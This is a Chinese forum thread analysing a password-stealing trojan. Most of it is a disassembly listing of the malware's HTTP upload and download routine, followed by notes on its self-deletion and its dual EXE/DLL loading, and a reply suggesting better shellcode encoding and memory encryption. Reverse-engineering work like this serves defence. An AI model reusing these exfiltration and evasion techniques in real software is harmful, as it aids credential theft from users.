00402498 75 04 jnz short 0040249E
0040249A 33C0 xor eax, eax
0040249C EB 3F jmp short 004024DD
0040249E FF75 FC push dword ptr
004024A1 8D45 F0 lea eax, dword ptr
004024A4 6A 01 push 0x1
004024A6 5F pop edi
004024A7 57 push edi
004024A8 FF75 14 push dword ptr
004024AB FF75 10 push dword ptr
004024AE 56 push esi
004024AF 53 push ebx
004024B0 6A 02 push 0x2
004024B2 50 push eax
004024B3 8D85 38E7FFFF lea eax, dword ptr
004024B9 50 push eax
004024BA 8D85 38FFFFFF lea eax, dword ptr
004024C0 50 push eax
004024C1 E8 FBFCFFFF call 004021C1
004024C6 85C0 test eax, eax
004024C8 74 03 je short 004024CD
004024CA 897D 18 mov dword ptr , edi
004024CD 68 00400000 push 0x4000
004024D2 56 push esi
004024D3 53 push ebx
004024D4 FF15 10414000 call dword ptr [<&kernel32.VirtualFre>; kernel32.VirtualFree
004024DA 8B45 18 mov eax, dword ptr
004024DD 5F pop edi
004024DE 5E pop esi
004024DF 5B pop ebx
004024E0 C9 leave
004024E1 C2 1400 retn 0x14OK,看下上传和下载部分:
004021C1 55 push ebp
004021C2 8BEC mov ebp, esp
004021C4 83EC 34 sub esp, 0x34
004021C7 53 push ebx
004021C8 56 push esi
004021C9 33F6 xor esi, esi
004021CB 33DB xor ebx, ebx
004021CD 56 push esi
004021CE 56 push esi
004021CF 56 push esi
004021D0 56 push esi
004021D1 68 00584000 push 00405800 ; wininet
004021D6 FF15 A8414000 call dword ptr [<&wininet.InternetOpe>; wininet.InternetOpenA
004021DC 3BC6 cmp eax, esi
004021DE 8945 F4 mov dword ptr , eax
004021E1 0F84 4B010000 je 00402332
004021E7 56 push esi
004021E8 56 push esi
004021E9 6A 03 push 0x3
004021EB 56 push esi
004021EC 56 push esi
004021ED FF75 2C push dword ptr
004021F0 FF75 08 push dword ptr
004021F3 50 push eax
004021F4 FF15 A4414000 call dword ptr [<&wininet.InternetCon>; wininet.InternetConnectA
004021FA 3BC6 cmp eax, esi
004021FC 8945 F8 mov dword ptr , eax
004021FF 0F84 24010000 je 00402329
00402205 3975 28 cmp dword ptr , esi
00402208 B8 F8574000 mov eax, 004057F8 ; post
0040220D 75 05 jnz short 00402214
0040220F B8 F4574000 mov eax, 004057F4 ; get
00402214 56 push esi
00402215 56 push esi
00402216 56 push esi
00402217 56 push esi
00402218 56 push esi
00402219 FF75 0C push dword ptr
0040221C 50 push eax
0040221D FF75 F8 push dword ptr
00402220 FF15 A0414000 call dword ptr [<&wininet.HttpOpenReq>; wininet.HttpOpenRequestA
00402226 3BC6 cmp eax, esi
00402228 8945 2C mov dword ptr , eax
0040222B 0F84 EF000000 je 00402320
00402231 57 push edi
00402232 6A 09 push 0x9
00402234 59 pop ecx
00402235 33C0 xor eax, eax
00402237 8D7D D0 lea edi, dword ptr
0040223A F3:AB rep stos dword ptr es:
0040223C 8B7D 10 mov edi, dword ptr
0040223F 8B45 1C mov eax, dword ptr
00402242 3BFE cmp edi, esi
00402244 C745 CC 2800000>mov dword ptr , 0x28
0040224B 8945 E8 mov dword ptr , eax
0040224E 74 2B je short 0040227B
00402250 8B45 14 mov eax, dword ptr
00402253 3BC6 cmp eax, esi
00402255 7E 24 jle short 0040227B
00402257 8945 08 mov dword ptr , eax
0040225A 68 00000020 /push 0x20000000
0040225F FF37 |push dword ptr
00402261 E8 5A170000 |call <jmp.&msvcrt.strlen>
00402266 59 |pop ecx
00402267 50 |push eax
00402268 FF37 |push dword ptr
0040226A FF75 2C |push dword ptr
0040226D FF15 9C414000 |call dword ptr [<&wininet.HttpAddReq>; wininet.HttpAddRequestHeadersA
00402273 83C7 04 |add edi, 0x4
00402276 FF4D 08 |dec dword ptr
00402279^ 75 DF \jnz short 0040225A
0040227B 56 push esi
0040227C 56 push esi
0040227D 8D45 CC lea eax, dword ptr
00402280 56 push esi
00402281 50 push eax
00402282 FF75 2C push dword ptr
00402285 FF15 98414000 call dword ptr [<&wininet.HttpSendReq>; wininet.HttpSendRequestExA
0040228B 85C0 test eax, eax
0040228D BF 00280000 mov edi, 0x2800
00402292 74 3B je short 004022CF
00402294 3975 18 cmp dword ptr , esi
00402297 74 36 je short 004022CF
00402299 33DB xor ebx, ebx
0040229B 3975 1C cmp dword ptr , esi
0040229E 76 2F jbe short 004022CF
004022A0 8B45 1C /mov eax, dword ptr
004022A3 8975 FC |mov dword ptr , esi
004022A6 2BC3 |sub eax, ebx
004022A8 3BC7 |cmp eax, edi
004022AA 76 02 |jbe short 004022AE
004022AC 8BC7 |mov eax, edi
004022AE 8D4D FC |lea ecx, dword ptr
004022B1 51 |push ecx
004022B2 50 |push eax
004022B3 8B45 18 |mov eax, dword ptr
004022B6 03C3 |add eax, ebx
004022B8 50 |push eax
004022B9 FF75 2C |push dword ptr
004022BC FF15 94414000 |call dword ptr [<&wininet.InternetWr>; wininet.InternetWriteFile
004022C2 3975 FC |cmp dword ptr , esi
004022C5 74 08 |je short 004022CF
004022C7 035D FC |add ebx, dword ptr
004022CA 3B5D 1C |cmp ebx, dword ptr
004022CD^ 72 D1 \jb short 004022A0
004022CF 56 push esi
004022D0 56 push esi
004022D1 56 push esi
004022D2 FF75 2C push dword ptr
004022D5 FF15 B4414000 call dword ptr [<&wininet.HttpEndRequ>; wininet.HttpEndRequestA
004022DB 3975 20 cmp dword ptr , esi
004022DE 74 36 je short 00402316
004022E0 33DB xor ebx, ebx
004022E2 3975 24 cmp dword ptr , esi
004022E5 76 2F jbe short 00402316
004022E7 8B45 24 /mov eax, dword ptr
004022EA 8975 FC |mov dword ptr , esi
004022ED 2BC3 |sub eax, ebx
004022EF 3BC7 |cmp eax, edi
004022F1 76 02 |jbe short 004022F5
004022F3 8BC7 |mov eax, edi
004022F5 8D4D FC |lea ecx, dword ptr
004022F8 51 |push ecx
004022F9 50 |push eax
004022FA 8B45 20 |mov eax, dword ptr
004022FD 03C3 |add eax, ebx
004022FF 50 |push eax
00402300 FF75 2C |push dword ptr
00402303 FF15 AC414000 |call dword ptr [<&wininet.InternetRe>; wininet.InternetReadFile
00402309 3975 FC |cmp dword ptr , esi
0040230C 74 08 |je short 00402316
0040230E 035D FC |add ebx, dword ptr
00402311 3B5D 24 |cmp ebx, dword ptr
00402314^ 72 D1 \jb short 004022E7
00402316 FF75 2C push dword ptr
00402319 FF15 B0414000 call dword ptr [<&wininet.InternetClo>; wininet.InternetCloseHandle
0040231F 5F pop edi
00402320 FF75 F8 push dword ptr
00402323 FF15 B0414000 call dword ptr [<&wininet.InternetClo>; wininet.InternetCloseHandle
00402329 FF75 F4 push dword ptr
0040232C FF15 B0414000 call dword ptr [<&wininet.InternetClo>; wininet.InternetCloseHandle
00402332 8BC3 mov eax, ebx
00402334 5E pop esi
00402335 5B pop ebx
00402336 C9 leave
00402337 C2 2800 retn 0x28
OK,到这里基本上就分析完了……
比较遗憾的是由于这个释放的DLL存放的路径以及基址和PE信息导致我们没有办法自己些loader来载入这个DLL现场调试,所以就看了个大概。
通过这个盗号病毒,我们学习了如何让程序通过批处理删除自身,如果让一个程序即能以EXE方式运行又能以DLL方式加载……
还有其它很多的新的东西有待我们学习(比如内存映射文件,Internet的操作:比如程序的自动更新,等等)。 第一次正八经儿的分析病毒,感觉还不错,嘿嘿。
发在这里感觉有点班门弄斧,让大家笑话了……:eee 太认真了
我要好好锻炼下自己
不能老是沉不住气 太牛逼了......膜拜船哥大作,分析的好详细啊.....太强了 添加到"病毒分析的精华文章索引"中 本帖最后由 惜双双 于 2009-10-25 00:24 编辑
这病毒有点脆弱.
应该好好补习下ShellCode编码技术..
以及内存加密模版的使用...
话说回来..能让EXE既可以执行又能当DLL加载..
这点倒挺有趣的..变形金刚啊;www 学习了!! 强。。。学习下 分析的很详细..继续加油 删除verclsid.exe 的原因 "应该" 是为了 explorer.exe 重起后 dll的正常运行..
因为 不删除 verclsid.exe文件,加载dll的进程是 verclsid.exe ,而删除了 加载dll的进程就是 explorer.exe,
这样就能设置 钩子